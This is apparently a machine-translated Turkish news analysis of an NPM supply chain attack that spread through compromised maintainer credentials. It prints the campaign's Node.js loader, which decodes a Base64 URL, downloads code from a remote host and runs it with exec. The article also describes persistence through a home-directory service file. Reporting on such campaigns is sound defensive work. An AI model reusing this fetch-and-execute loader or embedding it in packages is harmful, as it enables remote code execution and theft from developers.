Ağustos ayı sonlarında ortaya çıkan sofistike bir NPM tedarik zinciri saldırısı, popüler JavaScript kütüphanelerine kötü niyetli yükler enjekte ederek binlerce aşağı akış projesini hedefledi.
İlk raporlar, kötü şöhretli yazım hatası tekniğinin yeni bir varyantına dikkat çekti, ancak daha fazla analiz, meşru paket adları altında geri yüklenen modülleri yayınlamak için tehlikeye atılmış bakım bilgilerinden yararlanan daha ayrıntılı bir kampanya ortaya koydu.
Saldırı, ekosistem boyunca hızla yayıldı, kurumsal SaaS platformlarındaki uygulamalara, geliştirici takımlarına ve hatta eğitim projelerine dokundu.
Wiz.io araştırmacıları, zararsız kütüphane güncellemelerinden kısa bir süre sonra sürekli entegrasyon (CI) boru hatlarından kaynaklanan olağandışı ağ faaliyetini kaydetti.
İlk telemetri veri açığa çıkması önerirken, daha yakından inceleme, yüklerin yalnızca koşullu rutinleri yürüttüğünü ve doğrudan yıkıcı davranışlardan kaçındığını gösterdi.
Bunun yerine, kötü amaçlı kod örneklendi, ortam değişkenlerini, günlüğe kaydedilmiş sistem meta verilerini ve saldırgan kontrollü alanlardan ikincil yükleri indirmeye hazırlandı.
Tasarım gereği, saldırganlar tespit edilebilir anomalileri en aza indirdi, rutin paket güncellemeleri ve kalıcılığı korumak için dikkatli sürüm stratejileri ile harmanlandı.
Etki Değerlendirmeleri, 4.500’den fazla projenin, bakımcıların geri dönmesinden önce en az bir tehlikeye atılan sürüm getirdiğini tahmin etti.
Bu geniş erişime rağmen, kampanyaya bağlı blockchain tabanlı ödeme kanallarının ve kripto para birimi cüzdanlarının analizi, sadece bir avuç işlemin (200 $ ‘dan daha az değere sahip olan-sonuçta tamamlandığını gösterdi.
.webp)
Düşük finansal getiri, operatörlerin, modern tedarik zinciri tehditlerinin arkasındaki gelişen güdülerin altını çizerek, derhal para kazanmadan ziyade keşif ve dayanak oluşturma ile daha fazla ilgilendiklerini göstermektedir.
Wiz.io analistleri daha sonra, daha karmaşık URL’ler ve daha karmaşık kötü amaçlı yazılım aileleri için ilk evreleme noktası olarak hizmet veren Base64 kodlu veri blokları da dahil olmak üzere popüler CI günlüklerine gömülü ek uzlaşma (IOCS) göstergeleri belirledi.
Bu keşif, boru hattı komut dosyalarının hızlı bir şekilde yamalanmasını ve büyük geliştirme ekiplerinde NPM kayıt defteri kimlik bilgilerinin arttırılmasını sağladı.
Enfeksiyon mekanizması ve kalıcılık
Kötü niyetli paketler, iyi huylu görünümlü bir komut dosyası ile başlayan çok aşamalı bir enfeksiyon mekanizması kullanmıştır.
Kurulum üzerine, komut dosyası Node.js ile yazılmış küçük bir yükleyici yürütür:-
// figure1_loader.js
const https = require('https');
const { exec } = require('child_process');
const payloadUrl = Buffer.from('aHR0cHM6Ly9lbWFpbC5hZGRyZXNzLmNvbS9sb2FkZXIuanM=', 'base64').toString();
https.get(payloadUrl, (res) => {
let data="";
res.on('data', (chunk) => data += chunk);
res.on('end', () => {
exec(data, (error, stdout, stderr) => {
if (error) console.error(stderr);
else console.log(stdout);
});
});
});Bu, saldırganın basit dize eşleştirme savunmalarından kaçmak için Base64 kodlamasını kullanarak gerçek indirme URL’sini nasıl gizlediğini gösterir.
İkincil yükü aldıktan sonra, yükleyici, kullanıcının ana dizinine bir Node.js hizmet dosyası yazar ve sistem yeniden başlatmasında otomatik yürütme sağlar.
Bu hizmet, paket kaldırmalarından ve kayıt defteri temizlemelerinden kurtulan ve saldırganın tehlikeye atılan geliştirme ortamlarına uzun vadeli erişimini etkili bir şekilde sağlayan bir kalıcılık katmanı sunar.
Kampanya, zararsız görünen senaryoları ve şifreli evrelemeleri bir araya getirerek ortak tespit mekanizmalarından kaçındı ve tedarik zinciri tehditlerinin artan sofistike olmasının altını çizdi.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.